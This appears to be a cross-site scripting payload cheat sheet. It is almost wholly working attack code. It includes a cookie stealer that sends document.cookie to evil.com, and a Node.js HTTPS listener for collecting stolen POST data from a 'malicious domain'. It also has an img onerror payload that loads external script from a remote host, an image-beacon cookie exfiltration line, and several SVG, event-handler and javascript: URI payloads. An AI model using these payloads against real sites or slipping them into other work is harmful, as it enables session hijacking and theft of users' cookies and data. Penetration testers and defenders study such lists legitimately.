GET based interception (easiest and best to show PoC):

```javascript
// XSS cookie stealer PoC
var cookie = encodeURIComponent(document.cookie);
var url = 'https://evil.com/index.html/?victim_cookie=' + cookie;
window.location.href = url;
```
POST based interception (I am not responsible for what you do with this info):

- Get SSL certificates for your malicious domain:

```shell
sudo certbot certonly --standalone -d domain.tld
```

- Set up the listener with the SSL certificates:
```javascript
const https = require('https');
const fs = require('fs');

// Load the certificate and key
const cert = fs.readFileSync('cert.pem');
const key = fs.readFileSync('privkey.pem');

// Create the HTTPS server
const server = https.createServer({ cert, key }, (req, res) => {
  if (req.method === 'POST') {
    let data = '';
    req.on('data', (chunk) => {
      data += chunk;
    });
    req.on('end', () => {
      console.log(`Received data: ${data}`);
      res.writeHead(200, { 'Content-Type': 'text/plain' });
      res.end('Data received successfully!');
    });
  } else {
    res.writeHead(405, { 'Content-Type': 'text/plain' });
    res.end('Method not allowed!');
  }
});

// Listen on port 8080
server.listen(8080, () => {
  console.log('Server listening on port 8080');
});
```
- Inject external JavaScript without a `<script>` tag:

```html
<img src=x onerror="var script = document.createElement('script'); script.src = 'https://basedygt.github.io/xss.js'; document.head.appendChild(script);">
```
- Data exfiltration through an image source (when CSP is disabled):

```javascript
// Request an image from the attacker host with the cookie in the query string
new Image().src = 'https://evil.com/?data=' + encodeURIComponent(document.cookie);
```
Vulnerable when:

- Absence of the Content-Security-Policy header in the response
- Presence of a Content-Security-Policy header with a value of `default-src` or `none`
- CSS-based XSS (historical payload; current browsers do not execute `javascript:` URLs inside CSS `url()`):

```css
body { background-image: url('javascript:alert("XSS")'); }
```
- SVG XSS:

```html
<svg/onload=alert(document.domain)>
```

- Event handlers to execute the payload:

```html
<button onclick="alert('XSS')">Click Me</button>
```

- JavaScript protocol handler:

```html
<a href="javascript:alert('XSS')">Click Me</a>
```